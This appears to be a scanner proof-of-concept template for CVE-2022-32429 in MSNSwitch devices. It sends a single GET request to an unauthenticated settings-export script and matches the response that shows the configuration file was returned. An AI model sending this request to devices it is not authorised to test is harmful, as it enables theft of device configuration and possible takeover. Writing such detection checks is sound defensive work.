name: poc-yaml-msnswitch-cve-2022-32429
binding: ce5c70b9-bb95-454c-9680-2734799c3f56
manual: true
detail:
    author: h1ei1
    links:
        - https://elifulkerson.com/CVE-2022-32429/
    vulnerability:
        id: CT-473168
        level: critical
transport: http
rules:
    r1:
        request:
            cache: true
            method: GET
            path: /cgi-bin-hax/ExportSettings.sh
        expression: |
            response.status == 200 && response.body.bstartsWith(b"#The following line must not be removed") && "(?i)filename=.*?.dat".bmatches(bytes(response.headers["Content-Disposition"]))
expression: r1()
